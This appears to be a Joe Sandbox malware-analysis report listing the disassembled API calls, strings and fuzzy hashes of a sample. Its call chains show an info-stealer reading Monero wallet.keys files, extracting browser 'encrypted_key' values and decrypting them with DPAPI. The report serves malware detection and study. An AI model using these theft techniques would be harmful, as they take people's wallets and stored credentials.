                                  • Instruction Fuzzy Hash: DBE08CB0A40208BFC724DFE4E80AE697BB8EF04702F4000A4FD0A87280DA719E40DB92
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6A2E1
                                  • lstrlen.KERNEL32(00000000,00000000), ref: 00F6A3FF
                                  • lstrlen.KERNEL32(00000000), ref: 00F6A6BC
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6A743
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 94fdbaa9917c41d0f714b66a8c156021004fc983eb1421583128fda2a50485d3
                                  • Instruction ID: 7640df21be81dc5731e4895d847952ed1eded0fdc1dc32c15c8d5442d2e34024
                                  • Opcode Fuzzy Hash: 94fdbaa9917c41d0f714b66a8c156021004fc983eb1421583128fda2a50485d3
                                  • Instruction Fuzzy Hash: EBE1E5728101089ADB19FBA4DC91DEE733CAF94300F51C16AF52B76091EF386A59DB63
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6D481
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D698
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D6AC
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6D72B
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: 96334327434d7a580c460bb367ab276e2ab0684fcfae3f6376d55bb5851963f9
                                  • Instruction ID: 3be0593ea087f067500f199d369c09174aa79eb9b928a4a1d8edc9dc831b64d1
                                  • Opcode Fuzzy Hash: 96334327434d7a580c460bb367ab276e2ab0684fcfae3f6376d55bb5851963f9
                                  • Instruction Fuzzy Hash: D29136719101089BDB18FBA4DC56DEE7338AF94300F51C16AF51BA3091EF386A59EB63
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F78B60: GetSystemTime.KERNEL32(00F80E1A,016F9D28,00F805AE,?,?,00F613F9,?,0000001A,00F80E1A,00000000,?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F78B86
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 00F6D801
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D99F
                                  • lstrlen.KERNEL32(00000000), ref: 00F6D9B3
                                  • DeleteFileA.KERNEL32(00000000), ref: 00F6DA32
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
                                  • String ID:
                                  • API String ID: 211194620-0
                                  • Opcode ID: bcaf489451ff197d9feca5f3c0bbd92d243d68170f84b6f643fd22fcd87a7fba
                                  • Instruction ID: 9d2190b4850c71e611491fc5bb7ecb1b3638f4303ff741331aa31283ea67d572
                                  • Opcode Fuzzy Hash: bcaf489451ff197d9feca5f3c0bbd92d243d68170f84b6f643fd22fcd87a7fba
                                  • Instruction Fuzzy Hash: 1E8136719101089BDB08FBA4DC52DEE7738AF94300F51812AF11BA7091EF386A59EB63
                                  APIs
                                    • Part of subcall function 00F7A7A0: lstrcpy.KERNEL32(?,00000000), ref: 00F7A7E6
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F7A9B0: lstrlen.KERNEL32(?,016F8A70,?,\Monero\wallet.keys,00F80E17), ref: 00F7A9C5
                                    • Part of subcall function 00F7A9B0: lstrcpy.KERNEL32(00000000), ref: 00F7AA04
                                    • Part of subcall function 00F7A9B0: lstrcat.KERNEL32(00000000,00000000), ref: 00F7AA12
                                    • Part of subcall function 00F7A8A0: lstrcpy.KERNEL32(?,00F80E17), ref: 00F7A905
                                    • Part of subcall function 00F7A920: lstrcpy.KERNEL32(00000000,?), ref: 00F7A972
                                    • Part of subcall function 00F7A920: lstrcat.KERNEL32(00000000), ref: 00F7A982
                                  • StrStrA.SHLWAPI(00000000,00000000,00000000,?,?,00000000,?,00F81580,00F80D92), ref: 00F6F54C
                                  • lstrlen.KERNEL32(00000000), ref: 00F6F56B
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$FileLocal$Alloclstrcatlstrlen$CloseCreateFreeHandleReadSize
                                  • String ID: ^userContextId=4294967295$moz-extension+++
                                  • API String ID: 998311485-3310892237
                                  • Opcode ID: 02d05da10ce5fb4f23b841aa74421a019483dd7586f6c43e43eca0499f6bf55d
                                  • Instruction ID: d18ea99d88ec5dc0a9ec0b4e21566dfd3171ac55d5c9b7a811a267013d5f06fc
                                  • Opcode Fuzzy Hash: 02d05da10ce5fb4f23b841aa74421a019483dd7586f6c43e43eca0499f6bf55d
                                  • Instruction Fuzzy Hash: 4D511371D101089ADB08FBB4DC56DEE7378AF94300F41C529F51A67191EF386A1AEBA3
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcpy$lstrlen
                                  • String ID:
                                  • API String ID: 367037083-0
                                  • Opcode ID: 50a750e266babbe10d123cdfb985ce6a9adb0573ece1a70f7d77a4d2f8982357
                                  • Instruction ID: 89b362d535588dcc13f678b215e636480b6936faba8648b26f41acf09c1c64b7
                                  • Opcode Fuzzy Hash: 50a750e266babbe10d123cdfb985ce6a9adb0573ece1a70f7d77a4d2f8982357
                                  • Instruction Fuzzy Hash: DD414EB1D10109ABDB04EFA4DC45EEEB774EF44304F40C029E51A67280EB35AA49EFA3
                                  APIs
                                    • Part of subcall function 00F7A740: lstrcpy.KERNEL32(00F80E17,00000000), ref: 00F7A788
                                    • Part of subcall function 00F699C0: CreateFileA.KERNEL32(00000000,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F699EC
                                    • Part of subcall function 00F699C0: GetFileSizeEx.KERNEL32(000000FF,?), ref: 00F69A11
                                    • Part of subcall function 00F699C0: LocalAlloc.KERNEL32(00000040,?), ref: 00F69A31
                                    • Part of subcall function 00F699C0: ReadFile.KERNEL32(000000FF,?,00000000,00F6148F,00000000), ref: 00F69A5A
                                    • Part of subcall function 00F699C0: LocalFree.KERNEL32(00F6148F), ref: 00F69A90
                                    • Part of subcall function 00F699C0: CloseHandle.KERNEL32(000000FF), ref: 00F69A9A
                                    • Part of subcall function 00F78E30: LocalAlloc.KERNEL32(00000040,-00000001), ref: 00F78E52
                                  • StrStrA.SHLWAPI(00000000,"encrypted_key":"), ref: 00F69D39
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69AEF
                                    • Part of subcall function 00F69AC0: LocalAlloc.KERNEL32(00000040,?,?,?,00F64EEE,00000000,?), ref: 00F69B01
                                    • Part of subcall function 00F69AC0: CryptStringToBinaryA.CRYPT32(?,00000000,00000001,00000000,00F64EEE,00000000,00000000), ref: 00F69B2A
                                    • Part of subcall function 00F69AC0: LocalFree.KERNEL32(?,?,?,?,00F64EEE,00000000,?), ref: 00F69B3F
                                    • Part of subcall function 00F69B60: CryptUnprotectData.CRYPT32(?,00000000,00000000,00000000,00000000,00000000,?), ref: 00F69B84
                                    • Part of subcall function 00F69B60: LocalAlloc.KERNEL32(00000040,00000000), ref: 00F69BA3
                                    • Part of subcall function 00F69B60: LocalFree.KERNEL32(?), ref: 00F69BD3
                                  Strings
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: Local$Alloc$CryptFileFree$BinaryString$CloseCreateDataHandleReadSizeUnprotectlstrcpy
                                  • String ID: $"encrypted_key":"$DPAPI
                                  • API String ID: 2100535398-738592651
                                  • Opcode ID: 7a161499419aa72e007049c5e96f070cfdb8a0ccc2ee43581dd599e8f14cafbb
                                  • Instruction ID: bb2c5be40e94f95625bc167c67958081e91ca567a11c151f5d585700730d6e93
                                  • Opcode Fuzzy Hash: 7a161499419aa72e007049c5e96f070cfdb8a0ccc2ee43581dd599e8f14cafbb
                                  • Instruction Fuzzy Hash: D6313CB6D10209ABCB04EFE4DC85AEFB7BCFF48304F144529E905A7241EB749A05DBA1
                                  APIs
                                  • CreateFileA.KERNEL32(00F73AEE,80000000,00000003,00000000,00000003,00000080,00000000,?,00F73AEE,?), ref: 00F792FC
                                  • GetFileSizeEx.KERNEL32(000000FF,00F73AEE), ref: 00F79319
                                  • CloseHandle.KERNEL32(000000FF), ref: 00F79327
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: File$CloseCreateHandleSize
                                  • String ID:
                                  • API String ID: 1378416451-0
                                  • Opcode ID: d62461f9aa81d89e2564a69a4aa15e7487c02069f2614616a3fd0a895884918b
                                  • Instruction ID: 7f1195417a1425deca72507d68194c4a44ba59af6cb054bb5d5249dc44988d49
                                  • Opcode Fuzzy Hash: d62461f9aa81d89e2564a69a4aa15e7487c02069f2614616a3fd0a895884918b
                                  • Instruction Fuzzy Hash: D1F08C35E44208BBDB24DBF0EC08BAE7BB9AB48320F50C264F625A72C4D6B59640DB40
                                  APIs
                                  • __getptd.LIBCMT ref: 00F7C74E
                                    • Part of subcall function 00F7BF9F: __amsg_exit.LIBCMT ref: 00F7BFAF
                                  • __getptd.LIBCMT ref: 00F7C765
                                  • __amsg_exit.LIBCMT ref: 00F7C773
                                  • __updatetlocinfoEx_nolock.LIBCMT ref: 00F7C797
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: __amsg_exit__getptd$Ex_nolock__updatetlocinfo
                                  • String ID:
                                  • API String ID: 300741435-0
                                  • Opcode ID: d2a54402fbbc1679496adeba852e6a7309e71d5515c0b317ee0409b8b423da5c
                                  • Instruction ID: 0437d7b9d42e257f51489f746922affc22084b0890b1ade3bba9cb90203a07cf
                                  • Opcode Fuzzy Hash: d2a54402fbbc1679496adeba852e6a7309e71d5515c0b317ee0409b8b423da5c
                                  • Instruction Fuzzy Hash: 7DF06D329046049BD724BBB85C46B9D37A06F01B20F25C14FF41CA61D2DF6C5942BF97
                                  APIs
                                    • Part of subcall function 00F78DE0: SHGetFolderPathA.SHELL32(00000000,0000001C,00000000,00000000,?,?,000003E8), ref: 00F78E0B
                                  • lstrcat.KERNEL32(?,00000000), ref: 00F74F7A
                                  • lstrcat.KERNEL32(?,00F81070), ref: 00F74F97
                                  • lstrcat.KERNEL32(?,016F8A80), ref: 00F74FAB
                                  • lstrcat.KERNEL32(?,00F81074), ref: 00F74FBD
                                    • Part of subcall function 00F74910: wsprintfA.USER32 ref: 00F7492C
                                    • Part of subcall function 00F74910: FindFirstFileA.KERNEL32(?,?), ref: 00F74943
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FDC), ref: 00F74971
                                    • Part of subcall function 00F74910: StrCmpCA.SHLWAPI(?,00F80FE0), ref: 00F74987
                                    • Part of subcall function 00F74910: FindNextFileA.KERNEL32(000000FF,?), ref: 00F74B7D
                                    • Part of subcall function 00F74910: FindClose.KERNEL32(000000FF), ref: 00F74B92
                                  Memory Dump Source
                                  • Source File: 00000000.00000002.1465435754.0000000000F61000.00000040.00000001.01000000.00000003.sdmp, Offset: 00F60000, based on PE: true
                                  • Associated: 00000000.00000002.1465422002.0000000000F60000.00000004.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001011000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.000000000101D000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.0000000001042000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465435754.00000000011AA000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.00000000011BE000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000134B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.000000000142F000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001451000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001459000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465574571.0000000001468000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465801333.0000000001469000.00000080.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465931163.000000000160B000.00000040.00000001.01000000.00000003.sdmp
                                  • Associated: 00000000.00000002.1465953399.000000000160C000.00000080.00000001.01000000.00000003.sdmp
                                  Joe Sandbox IDA Plugin
                                  • Snapshot File: hcaresult_0_2_f60000_file.jbxd
                                  Yara matches
                                  Similarity
                                  • API ID: lstrcat$Find$File$CloseFirstFolderNextPathwsprintf
                                  • String ID:
                                  • API String ID: 2667927680-0
                                  • Opcode ID: 29fc6a45db36c7bf7f1bdb62437571f6cac04030820559505f0bb5cd8cd38f2d
                                  • Instruction ID: d57a92fd7432822e2cfb63fefb36b970a8d8d2be9bd3f97cd4d8a5bbbbc4afe6
                                  • Opcode Fuzzy Hash: 29fc6a45db36c7bf7f1bdb62437571f6cac04030820559505f0bb5cd8cd38f2d
                                  • Instruction Fuzzy Hash: B021FB76900204A7C7A8FB70EC46EED373CAF54300F404555B65A93085EF789AC9DB92